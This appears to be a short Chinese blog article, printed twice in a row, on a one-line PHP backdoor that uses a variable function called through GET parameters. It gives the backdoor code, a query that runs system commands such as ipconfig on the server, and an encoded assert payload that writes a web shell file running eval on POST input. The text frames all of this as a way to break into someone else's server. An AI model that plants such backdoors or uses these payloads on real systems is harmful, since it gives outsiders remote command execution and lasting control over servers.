这个简单的PHP可变函数后门是如何实现的?
- 内容介绍
- 文章标签
- 相关推荐
本文共计202个文字,预计阅读时间需要1分钟。
这是一个非常简单的PHP可变函数,通过GET方法传递参数即可构成后门?PHP$_GET['a']($_GET['b']);?如果在URL中输入下面代码,这个可变函数就相当于system(ipconfig),就可以在网页上显示对方服务器的IP地址。
这是一个非常简单的php可变函数,用get方法传参就能构成后门
<?php
$_GET['a']($_GET['b']);
?>
如在URL中输入下面代码,这个可变函数就相当于system(ipconfig),就能在网页上显示对方服务器的ip、网关等信息。
?a=system&b=ipconfig
如果用get方法输入下面的一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但同样会生成木马,成功达到入侵对方服务器的目的,真可谓不容小觑!
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
本文共计202个文字,预计阅读时间需要1分钟。
这是一个非常简单的PHP可变函数,通过GET方法传递参数即可构成后门?PHP$_GET['a']($_GET['b']);?如果在URL中输入下面代码,这个可变函数就相当于system(ipconfig),就可以在网页上显示对方服务器的IP地址。
这是一个非常简单的php可变函数,用get方法传参就能构成后门
<?php
$_GET['a']($_GET['b']);
?>
如在URL中输入下面代码,这个可变函数就相当于system(ipconfig),就能在网页上显示对方服务器的ip、网关等信息。
?a=system&b=ipconfig
如果用get方法输入下面的一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但同样会生成木马,成功达到入侵对方服务器的目的,真可谓不容小觑!
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};